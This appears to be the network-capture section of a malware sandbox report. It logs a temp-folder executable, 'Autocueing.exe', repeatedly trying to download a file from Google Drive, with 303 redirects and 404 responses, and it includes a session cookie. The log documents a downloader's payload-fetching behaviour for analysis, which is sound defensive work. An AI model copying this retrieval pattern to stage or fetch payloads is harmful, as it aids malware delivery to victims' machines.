                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50002 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:23 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7lMppWOlM3xo9lfPJ7DhxAMiouHuPfxrl4hPw89Hq-1HfFsTsdnPwkHmkbJabjVW1p
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:23 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-7CsTRVnb4WasGqGK96J1jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NNYejqWWaGGNp5L0CO6JXw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50003 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:24 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:25 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:24 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-O9j-yV2Hy2uTsoPzXeK7Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50004 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:25 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:26 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgT2Tz-nLzfeouiVMgcteM6clqyKurOgG0pxibDr2J-_vv4rYGkrLgy9wNiZWKdMJMBHtpOv-HM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:26 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-X6FZ-3sKC4xX1WAH8kl5vQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:26 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="66C6Md4azAy-4PaP2QMx4A">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50005 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:27 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:27 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:27 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-htCaTS-o4Q16lxyIKjqv7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50006 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:28 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:28 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQdg3TVMX-a_iPYLkbx62FkNZvU-ShDRB7Od-cL7zyNH_2A1-OU21lheM8M_RrhuAlh
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:28 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-CvaZZ2HMnDn9pXKW8Navpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:28 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m0DTEe5spRens2Jjrulhbg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50007 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:29 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:29 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:29 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-cXw8WEQpnQnbSU_VEbUa2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50008 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:30 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:30 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSW7B4xK-iM24x1n-HxQhtt6NgWM2W9XbogRsDXtHAuD_k4XzDtHGH1gjsyCslUyLHcBBy_IvY
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:30 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-FkxsjrcmzWo7SotIYkIFbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:30 UTC | 1652 | IN
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jIMMeVoYirWF9NuczVmauw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50009 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:31 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:31 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:31 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
